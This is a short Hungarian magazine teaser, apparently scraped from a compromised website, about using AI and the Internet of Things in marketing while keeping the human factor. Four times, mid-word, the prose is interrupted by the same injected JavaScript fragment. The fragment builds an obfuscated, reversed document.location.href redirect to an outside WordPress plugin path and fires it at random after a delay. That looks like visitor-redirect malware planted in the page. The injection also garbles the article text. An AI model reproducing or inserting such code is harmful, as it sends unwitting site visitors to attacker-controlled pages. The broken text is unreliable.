Manapság nem számít szokatlannak, ha valahol mesterséges intelligenciát (artifical intelligence, AI) használnak a készletek beszerzéséhez vagy az új termékek piacra dobásához. Ha egy vállalat megfelelően használja ki a dolgok internetében rejlő lehetőségeket, hamar versenyelőnybe kerülhet más piaci szereplőkkel szemben. A „képletből” azonban sokszor kimarad az emberi tényező, holott a szakemberek toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}továbbra is szerves részét kell, hogy képezzék a marketingstratégiának és folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toknak. Az IoT-ra (Internet of Things) sokan olyan „tényezőként” gondolnak, ami összeköti a felokosítoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tott vagy „teljesen okos” városokat, lehetővé téve ezzel például az egészségügy távoli felügyeletét vagy az ellátási lánc hatékonyságának növelését. Az AI algoritmusok pedig segíthetnek monitoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torozni az intelligens…
A cikk folytatódik: http://sikeresceg.co.hu/menedzsment/2019/08/05/hatekonyabb-lehet-marketing-is-az-iot-segitsegevel.html
- Hirdetés -